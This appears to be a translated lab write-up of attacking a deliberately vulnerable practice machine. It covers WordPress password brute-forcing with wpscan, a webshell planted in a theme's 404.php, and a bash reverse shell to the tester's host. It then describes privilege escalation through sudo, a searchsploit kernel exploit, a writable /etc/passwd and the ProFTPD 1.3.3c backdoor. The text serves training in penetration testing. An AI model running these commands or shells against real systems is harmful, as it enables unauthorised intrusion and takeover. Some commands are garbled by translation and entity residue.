Infiltration actual target drone 3wp

0x00 Introduction

Target IP: xxxx.95

Test IP: xxxx.96

Test environment: win10, kali, etc.

Test time: 2021.7.23-2021.7.26

Tester: ruanruan

0x01 Information Collection

1. Port scanning

  • 21,ftp,ProFTPD,1.3.3c
  • 22, ssh, Openssh, 7.2
  • 80, web
2. Directory scanning

Scan to the /secret/ directory through Edgeworth

Visit the wordpress blog

0x02 First attempt

1, 21 port-ftp
  • Anonymous login, failed
  • Weak password, failed
2, 22 port-ssh

High version, not tried yet

3. Port 80-wordpress
  • Try to getshell in the background and edit a sentence on the submission page, but failed.
  • Find vulnerabilities in WordPress 4.9 version, many cannot getshell
  • wpscan scans plug-ins, themes, usernames and other vulnerabilities, and no findings are found

Use wpscan to first enumerate the user name, and then crack the password to get admin/admin.

wpscan –url xxxx.95/secret -e u

wpscan –url xxxx.95/secret/ -U admin -P rockyou.txt

Visit the wp default background to log in.

0x03 getshell

Common methods of wordpress background getshell are:

  • Online editing
  • upload files
    • media files
    • theme files
    • Plug-ins (webshell plug-ins, non-vulnerability plug-ins)

This is through the online editing page.

First click on the topic, select editor to edit the 404 page, and write a sentence

Full page link: http://xxxx.95/secret/wp-content/themes/twentyseventeen/404.php

Then connect with chopper, getshell

0x04 Obtain high authority user

1. Collect information

Check the id, currently it is www-data

Check port opening status

netstat -ano

View database configuration

Check the home directory and guess marlinspike as the user name

Enter the marlinspike directory, and there are two prompt messages: sudo privilege escalation and proftpd backdoor?

Check etc/passwd to confirm that the user exists

The shell of the kitchen knife is not easy to use. Redirect the shell to kali.

bash -c 'bash -i > & amp;/dev/tcp/xxxx.96/2333' 0> & amp;1

2. Utilization of information

Guess the account password is marlinspike/marlinspike, log in via ssh

Then continue to collect information and try to escalate privileges.

0x05 Privilege Elevation

1. Information collection & amp;try
  • Common privilege escalation attempts in Linux:
    • sudo: sudo -l
    • suid
      • find / -type f -perm -u=s 2>/dev/null -ls
    • crontab
      • ls -l |grep cron*
      • ls -al to see if there are scripts executed with root permissions
    • nfs
      • showmount -e ip
    • Kernel
      • uname -a
      • searchsploit
  • Mysql privilege escalation attempt, the mysql service runs with mysql permissions, and the privilege escalation can only obtain the mysql account
  • ftp also does not run with root privileges. If you escalate privileges, you can only get the ftp user, not the root user.
2. Sudo privilege escalation

sudo -l, view commands run with root privileges

All~~, directly sudo su

3. Kernel privilege escalation
uname -a


searchsploit ubuntu 4.10.0

View exp details and get the path

searchsploit -p 45010.c

Log in to sftp and upload exp

sftp [email protected]
put 45010.c

Compile the .c file and execute it

gcc 45010.c -o exp
la -l exp
./exp
/bin/bash

4. Low-privilege users can directly modify the root password

The marlinspike account has write permissions for this file.

ls -al /etc/passwd

You can directly modify X as the new password

5. Use ProFTPD1.3.3c backdoor vulnerability to escalate privileges

The previous prompt message hints at a backdoor and does not make good use of search.

Search: proftpd 1.3.3.c backdoor

Specific reference: https://blog.csdn.net/weixin_34384681/article/details/89798540

Key vulnerability code:

if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); }

0x06 Summary

1. Problems encountered
  • wordpress background getshell, online editing location attempt error
    • If you are not familiar with the common getshell methods in the WordPress backend, try them all.
  • Redirecting shell from chopper to kali fails, showing /bin/sh, syntax error
    • The webshell is not a complete interactive shell, which can be solved by bash -c ‘xxx’
  • When looking for the marlinspike password, I did not try the username directly.
    • After trying to obtain it by collecting other information, if you encounter any unknown password, you can try the user name first and then try methods such as information collection and blasting.
  • Didn’t notice that /etc/passwd can be modified directly
    • For files such as etc/passwd, /etc/shadow, and .sh, pay attention to their current user permissions and execution permissions.
  • No privilege escalation method for proftpd backdoor vulnerability found
    • Didn’t know about the vulnerability, but didn’t use the search well. Think more and search for the usefulness of each piece of information.
2. Knowledge points
  • Summary of wordpress background getshell method
  • ProFTPD backdoor privilege escalation vulnerability
  • The idea of elevating power
    • Get password directly
    • Privilege escalation for services running with root privileges
3. Reflection
  • What’s done better
    • Thinking will be clearer
    • The collected information is better integrated and analyzed
    • Be more proficient in elevating privileges in Linux
  • Where we need to continue working hard
    • Understanding the scope of vulnerabilities in common services and cms
    • Thinking and utilizing key information